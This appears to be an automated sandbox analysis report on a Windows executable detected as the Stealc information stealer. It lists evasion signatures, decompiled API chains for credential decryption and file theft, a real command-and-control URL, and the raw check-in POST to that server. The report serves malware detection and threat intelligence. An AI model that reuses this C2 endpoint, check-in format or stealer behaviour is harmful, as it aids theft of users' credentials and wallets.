Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1565981
MD5:a8d083b25843d8b182146793d9665ac5
SHA1:7d64723ba2c0fa76e3f1126d3583331364e8815e
SHA256:4597e4ff598b3353854bce87b300cc65cab353aad474b32fb2768b6931983973
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contain functionality to detect virtual machines
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse usering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 7028 cmdline: "C:\Users\user\Desktop\file.exe" MD5: A8D083B25843D8B182146793D9665AC5)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.206/c4becf79229cb002.php"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000001.00000003.2188621265.0000000004F70000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000001.00000002.2277505797.00000000012DE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 7028JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 7028JoeSecurity_StealcYara detected StealcJoe Security

              Sigma Signatures

              No Sigma rule has matched

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-01T03:32:19.481696+010020442431Malware Command and Control Activity Detected192.168.2.649720185.215.113.20680TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: file.exeAvira: detected
              Antivirus detection for URL or domain
              Source: http://185.215.113.206/c4becf79229cb002.php6/EAvira URL Cloud: Label: malware
              Source: http://185.215.113.206/c4becf79229cb002.php2.YAvira URL Cloud: Label: malware
              Source: http://185.215.113.206/c4becf79229cb002.phpR.Avira URL Cloud: Label: malware
              Found malware configuration
              Source: 00000001.00000002.2277505797.00000000012DE000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php"}
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Machine Learning detection for sample
              Source: file.exeJoe Sandbox ML: detected
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_008E4C50 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,1_2_008E4C50
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_008E60D0 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,lstrlen,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,1_2_008E60D0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_008F6AA0 lstrcpy,SHGetFolderPathA,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,LocalAlloc,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,1_2_008F6AA0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_009042C0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,1_2_009042C0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_008E9B80 CryptUnprotectData,LocalAlloc,LocalFree,1_2_008E9B80
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_008EEB80 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,1_2_008EEB80
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_008E9B20 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,1_2_008E9B20
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_008F6CB9 lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,1_2_008F6CB9
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_008E7750 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,1_2_008E7750
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: Binary string: .PdBo source: file.exe, 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_008F19F0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,1_2_008F19F0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_008F3A70 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_008F3A70
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_008EDB80 lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_008EDB80
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_008F13A0 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_008F13A0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_008F13B9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_008F13B9
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_008FE3F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,1_2_008FE3F0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_008F4C89 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,1_2_008F4C89
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_008F24E0 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,1_2_008F24E0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_008F24F9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,1_2_008F24F9
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_008F4C70 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_008F4C70
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_008FCDD0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,1_2_008FCDD0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_008E16A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,1_2_008E16A0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_008E16B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,1_2_008E16B9
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_008FD720 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_008FD720
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_008FDF20 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,1_2_008FDF20

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49720 -> 185.215.113.206:80
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: http://185.215.113.206/c4becf79229cb002.php
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDAAKEHJDHJKEBFHJEGDHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 41 41 4b 45 48 4a 44 48 4a 4b 45 42 46 48 4a 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 32 43 31 36 36 31 37 39 32 41 43 33 33 34 33 34 31 32 31 34 38 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 41 4b 45 48 4a 44 48 4a 4b 45 42 46 48 4a 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 72 75 6d 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 41 4b 45 48 4a 44 48 4a 4b 45 42 46 48 4a 45 47 44 2d 2d 0d 0a Data Ascii: ------IDAAKEHJDHJKEBFHJEGDContent-Disposition: form-data; name="hwid"B2C1661792AC3343412148------IDAAKEHJDHJKEBFHJEGDContent-Disposition: form-data; name="build"drum------IDAAKEHJDHJKEBFHJEGD--
              Source: Joe Sandbox ViewIP Address: 185.215.113.206 185.215.113.206
              Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_008E6C40 lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,lstrcpy,1_2_008E6C40
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
              Source: unknownHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDAAKEHJDHJKEBFHJEGDHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 41 41 4b 45 48 4a 44 48 4a 4b 45 42 46 48 4a 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 32 43 31 36 36 31 37 39 32 41 43 33 33 34 33 34 31 32 31 34 38 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 41 4b 45 48 4a 44 48 4a 4b 45 42 46 48 4a 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 72 75 6d 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 41 4b 45 48 4a 44 48 4a 4b 45 42 46 48 4a 45 47 44 2d 2d 0d 0a Data Ascii: ------IDAAKEHJDHJKEBFHJEGDContent-Disposition: form-data; name="hwid"B2C1661792AC3343412148------IDAAKEHJDHJKEBFHJEGDContent-Disposition: form-data; name="build"drum------IDAAKEHJDHJKEBFHJEGD--
              Source: file.exe, 00000001.00000002.2277505797.00000000012DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206
              Source: file.exe, 00000001.00000002.2277505797.00000000012DE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2277505797.0000000001338000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/
              Source: file.exe, 00000001.00000002.2277505797.0000000001338000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/9
              Source: file.exe, 00000001.00000002.2277505797.0000000001338000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/:
              Source: file.exe, 00000001.00000002.2277505797.0000000001338000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
              Source: file.exe, 00000001.00000002.2277505797.0000000001338000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/
              Source: file.exe, 00000001.00000002.2277505797.0000000001349000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php2.Y
              Source: file.exe, 00000001.00000002.2277505797.0000000001349000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php6/E
              Source: file.exe, 00000001.00000002.2277505797.0000000001349000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpR.
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_008E9770 memset,memset,lstrcat,lstrcat,lstrcat,memset,wsprintfA,OpenDesktopA,CreateDesktopA,lstrcat,lstrcat,lstrcat,memset,SHGetFolderPathA,lstrcpy,StrStrA,lstrcpyn,lstrlen,wsprintfA,lstrcpy,Sleep,CloseDesktop,1_2_008E9770

              System Summary

              barindex
              PE file contains section with special chars
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00CA20FA1_2_00CA20FA
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00C918F01_2_00C918F0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00C948B51_2_00C948B5
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00C9D0511_2_00C9D051
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00BB08711_2_00BB0871
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00C999C61_2_00C999C6
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00CA71951_2_00CA7195
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00C9E9AA1_2_00C9E9AA
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00C40AE51_2_00C40AE5
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00904AC01_2_00904AC0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00BEC2C91_2_00BEC2C9
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00CA3B561_2_00CA3B56
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00C964D71_2_00C964D7
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00C9B4881_2_00C9B488
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B894CE1_2_00B894CE
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00CA5DC11_2_00CA5DC1
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00CA05D61_2_00CA05D6
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00C92ECE1_2_00C92ECE
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B3FF731_2_00B3FF73
              Source: C:\Users\user\Desktop\file.exeCode function: String function: 008E4A60 appears 316 times
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: file.exeStatic PE information: Section: yktwzmco ZLIB complexity 0.9947829358427309
              Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_009048B0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,1_2_009048B0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_008FCCD0 CoCreateInstance,MultiByteToWideChar,lstrcpyn,1_2_008FCCD0
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\X43L2BNL.htmJump to behavior
